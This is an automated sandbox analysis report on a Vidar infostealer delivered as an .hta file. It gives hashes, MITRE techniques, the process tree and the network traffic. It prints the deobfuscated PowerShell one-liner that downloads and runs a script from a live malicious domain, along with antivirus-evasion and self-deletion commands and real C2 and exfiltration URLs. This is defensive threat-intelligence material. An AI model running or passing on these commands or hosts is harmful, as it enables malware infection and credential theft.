vidar | edebb1c19818a5dc2f09d95f6852c328e9427bc460c3517b543cdf101fba7d84

Resubmissions

23/12/2024, 13:11 UTC

241223-qe4yfszrgj 10

23/12/2024, 12:31 UTC

241223-pqanbazjcs 10

Analysis

max time kernel
93s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23/12/2024, 13:11 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.hta
Size

722B
MD5

4f2067f591d1db46908f42c461b43bc8
SHA1

dbb6c2be0345648645105f5f8646662e319a01ba
SHA256

edebb1c19818a5dc2f09d95f6852c328e9427bc460c3517b543cdf101fba7d84
SHA512

5fde4eea4445de8ac73e510c43475b025d12d8f4e9c71e230d7b99a49efc8c6fa381bcda09295c26afb294bd67cf0a63c20f538dd3b66b702ca9f1ac75bf1c9a

Score

10^/10

vidar credential_access discovery execution spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

1
&{$u = "https://polovoiinspektor.shop/secure/login.txt", $c = (invoke-webrequest -uri $u -usebasicparsing).content, $b = [scriptblock]::create($c), &$b}
2

URLs

exe.dropper

https://polovoiinspektor.shop/secure/login.txt

Signatures

Detect Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral2/memory/1392-121-0x00000000044B0000-0x00000000046E9000-memory.dmp	family_vidar_v7
behavioral2/memory/1392-120-0x00000000044B0000-0x00000000046E9000-memory.dmp	family_vidar_v7
behavioral2/memory/1392-128-0x00000000044B0000-0x00000000046E9000-memory.dmp	family_vidar_v7
behavioral2/memory/1392-129-0x00000000044B0000-0x00000000046E9000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Blocklisted process makes network request 4 IoCs

flow	pid	Process
13	2268	powershell.exe
15	2268	powershell.exe
22	2268	powershell.exe
25	2268	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2268	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	drtg4eyr.uj3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Wb.com

Executes dropped EXE 2 IoCs

pid	Process
1656	drtg4eyr.uj3.exe
1392	Wb.com

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ifconfig.me
22	ifconfig.me

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1100	tasklist.exe
4088	tasklist.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\CommercialGm	drtg4eyr.uj3.exe
File opened for modification	C:\Windows\AirMotors	drtg4eyr.uj3.exe
File opened for modification	C:\Windows\PanScout	drtg4eyr.uj3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wb.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	drtg4eyr.uj3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Wb.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Wb.com

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4236	timeout.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2268	powershell.exe
2268	powershell.exe
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com
1392	Wb.com

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	1100	tasklist.exe
Token: SeDebugPrivilege	4088	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1392	Wb.com
1392	Wb.com
1392	Wb.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1392	Wb.com
1392	Wb.com
1392	Wb.com

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4528 wrote to memory of 2268	4528	mshta.exe	82
PID 4528 wrote to memory of 2268	4528	mshta.exe	82
PID 4528 wrote to memory of 2268	4528	mshta.exe	82
PID 2268 wrote to memory of 1936	2268	powershell.exe	84
PID 2268 wrote to memory of 1936	2268	powershell.exe	84
PID 2268 wrote to memory of 1936	2268	powershell.exe	84
PID 1936 wrote to memory of 2780	1936	csc.exe	85
PID 1936 wrote to memory of 2780	1936	csc.exe	85
PID 1936 wrote to memory of 2780	1936	csc.exe	85
PID 2268 wrote to memory of 1656	2268	powershell.exe	86
PID 2268 wrote to memory of 1656	2268	powershell.exe	86
PID 2268 wrote to memory of 1656	2268	powershell.exe	86
PID 1656 wrote to memory of 3132	1656	drtg4eyr.uj3.exe	89
PID 1656 wrote to memory of 3132	1656	drtg4eyr.uj3.exe	89
PID 1656 wrote to memory of 3132	1656	drtg4eyr.uj3.exe	89
PID 3132 wrote to memory of 1100	3132	cmd.exe	93
PID 3132 wrote to memory of 1100	3132	cmd.exe	93
PID 3132 wrote to memory of 1100	3132	cmd.exe	93
PID 3132 wrote to memory of 3988	3132	cmd.exe	94
PID 3132 wrote to memory of 3988	3132	cmd.exe	94
PID 3132 wrote to memory of 3988	3132	cmd.exe	94
PID 3132 wrote to memory of 4088	3132	cmd.exe	95
PID 3132 wrote to memory of 4088	3132	cmd.exe	95
PID 3132 wrote to memory of 4088	3132	cmd.exe	95
PID 3132 wrote to memory of 4700	3132	cmd.exe	96
PID 3132 wrote to memory of 4700	3132	cmd.exe	96
PID 3132 wrote to memory of 4700	3132	cmd.exe	96
PID 3132 wrote to memory of 4280	3132	cmd.exe	97
PID 3132 wrote to memory of 4280	3132	cmd.exe	97
PID 3132 wrote to memory of 4280	3132	cmd.exe	97
PID 3132 wrote to memory of 4064	3132	cmd.exe	98
PID 3132 wrote to memory of 4064	3132	cmd.exe	98
PID 3132 wrote to memory of 4064	3132	cmd.exe	98
PID 3132 wrote to memory of 2484	3132	cmd.exe	100
PID 3132 wrote to memory of 2484	3132	cmd.exe	100
PID 3132 wrote to memory of 2484	3132	cmd.exe	100
PID 3132 wrote to memory of 3248	3132	cmd.exe	101
PID 3132 wrote to memory of 3248	3132	cmd.exe	101
PID 3132 wrote to memory of 3248	3132	cmd.exe	101
PID 3132 wrote to memory of 1392	3132	cmd.exe	102
PID 3132 wrote to memory of 1392	3132	cmd.exe	102
PID 3132 wrote to memory of 1392	3132	cmd.exe	102
PID 3132 wrote to memory of 4336	3132	cmd.exe	103
PID 3132 wrote to memory of 4336	3132	cmd.exe	103
PID 3132 wrote to memory of 4336	3132	cmd.exe	103
PID 1392 wrote to memory of 4032	1392	Wb.com	106
PID 1392 wrote to memory of 4032	1392	Wb.com	106
PID 1392 wrote to memory of 4032	1392	Wb.com	106
PID 4032 wrote to memory of 4236	4032	cmd.exe	108
PID 4032 wrote to memory of 4236	4032	cmd.exe	108
PID 4032 wrote to memory of 4236	4032	cmd.exe	108

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4528
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& {$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9wb2xvdm9paW5zcGVrdG9yLnNob3Avc2VjdXJlL2xvZ2luLnR4dA=='));$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content;$B=[scriptblock]::Create($C);&$B}"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB016.tmp" "c:\Users\Admin\AppData\Local\Temp\obnnmmot\CSC8DF14D57E40E4CD59F40DFE961FA71E.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2780
- - C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe
    "C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3132
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3988
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4700
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 623615
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4280
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Distances
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4064
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Duck" Ix
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2484
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3248
    - - C:\Users\Admin\AppData\Local\Temp\623615\Wb.com
        
        Wb.com f
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1392
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\KNG4E3OZMOZU" & exit
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4032
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4236
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4336

Network

DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

polovoiinspektor.shop

powershell.exe

Remote address:

8.8.8.8:53

Request

polovoiinspektor.shop

IN A

Response

polovoiinspektor.shop

IN A

185.121.235.167
GET

https://polovoiinspektor.shop/secure/login.txt

powershell.exe

Remote address:

185.121.235.167:443

Request

GET /secure/login.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: polovoiinspektor.shop
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.26.2
Date: Mon, 23 Dec 2024 13:11:44 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 1264
Last-Modified: Mon, 23 Dec 2024 12:47:49 GMT
Connection: keep-alive
ETag: "67695bf5-4f0"
Accept-Ranges: bytes
DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.110.133
GET

https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe

powershell.exe

Remote address:

185.199.109.133:443

Request

GET /MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 1111393
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "6034a3e23f5d37f82b6b551e606b7b7b2df095f09fa1b3f56cc84a496c13bbca"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 0AB4:1B4DCA:69545B:8C8DE5:67696097
Accept-Ranges: bytes
Date: Mon, 23 Dec 2024 13:11:44 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600022-LCY
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1734959505.673626,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 699da9a7a7847778c0d08b743061d229c7486d18
Expires: Mon, 23 Dec 2024 13:16:44 GMT
Source-Age: 249
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

167.235.121.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.235.121.185.in-addr.arpa

IN PTR

Response

167.235.121.185.in-addr.arpa

IN PTR

v200070hosted-by-vdsinacom
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

ifconfig.me

powershell.exe

Remote address:

8.8.8.8:53

Request

ifconfig.me

IN A

Response

ifconfig.me

IN A

34.160.111.145
GET

https://ifconfig.me/ip

powershell.exe

Remote address:

34.160.111.145:443

Request

GET /ip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: ifconfig.me
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

date: Mon, 23 Dec 2024 13:11:46 GMT
content-type: text/plain
Content-Length: 14
access-control-allow-origin: *
via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

145.111.160.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.111.160.34.in-addr.arpa

IN PTR

Response

145.111.160.34.in-addr.arpa

IN PTR

14511116034bcgoogleusercontentcom
DNS

saaadnesss.shop

powershell.exe

Remote address:

8.8.8.8:53

Request

saaadnesss.shop

IN A

Response

saaadnesss.shop

IN A

185.121.235.167
POST

https://saaadnesss.shop/connect

powershell.exe

Remote address:

185.121.235.167:443

Request

POST /connect HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
Host: saaadnesss.shop
Content-Length: 33
Connection: Keep-Alive

Response

HTTP/1.1 200

Server: nginx/1.26.2
Date: Mon, 23 Dec 2024 13:11:48 GMT
Content-Type: application/json
Content-Length: 20
Connection: keep-alive
vary: Origin
DNS

jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx

Wb.com

Remote address:

8.8.8.8:53

Request

jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx

IN A

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

t.me

Wb.com

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/k04ael

Wb.com

Remote address:

149.154.167.99:443

Request

GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 13:12:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12298
Connection: keep-alive
Set-Cookie: stel_ssid=cf4f49f67854273cc9_9565173306734016076; expires=Tue, 24 Dec 2024 13:12:04 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

bijutr.shop

Wb.com

Remote address:

8.8.8.8:53

Request

bijutr.shop

IN A

Response

bijutr.shop

IN A

188.245.216.205
GET

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HLX4EUSR1N7QQIMGVASR
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9HVSRQ90HDJM7QIW4OHD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

e5.o.lencr.org

Wb.com

Remote address:

8.8.8.8:53

Request

e5.o.lencr.org

IN A

Response

e5.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

92.123.77.34

a1887.dscq.akamai.net

IN A

92.123.77.67
GET

http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

Wb.com

Remote address:

92.123.77.34:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e5.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 345
ETag: "925107482F0B720C871FA7FEB51669ACDE93F83B32EB860D03676CBAF4B83E3B"
Last-Modified: Mon, 23 Dec 2024 08:54:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6141
Expires: Mon, 23 Dec 2024 14:54:27 GMT
Date: Mon, 23 Dec 2024 13:12:06 GMT
Connection: keep-alive
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----H47YMGLX4OZM7YC2NOZM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

205.216.245.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.216.245.188.in-addr.arpa

IN PTR

Response

205.216.245.188.in-addr.arpa

IN PTR

static205216245188clientsyour-serverde
DNS

168.245.100.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.245.100.95.in-addr.arpa

IN PTR

Response

168.245.100.95.in-addr.arpa

IN PTR

a95-100-245-168deploystaticakamaitechnologiescom
DNS

34.77.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.77.123.92.in-addr.arpa

IN PTR

Response

34.77.123.92.in-addr.arpa

IN PTR

a92-123-77-34deploystaticakamaitechnologiescom
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----US0HDTJW4EU3E37900ZU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 300
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----OP8QIECJ5XBIM7Y5XBAI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----US0HDTJW4EU3E37900ZU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Wb.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----S26PZCJEC2V37YCBAIMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 13:12:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response

185.121.235.167:443

https://polovoiinspektor.shop/secure/login.txt

tls, http

powershell.exe

843 B
4.3kB
8
6

HTTP Request

GET https://polovoiinspektor.shop/secure/login.txt

HTTP Response

200
185.199.109.133:443

https://raw.githubusercontent.com/MOGEEK02/supreme-octo-palm-tree/refs/heads/main/ChoForgot.exe

tls, http

powershell.exe

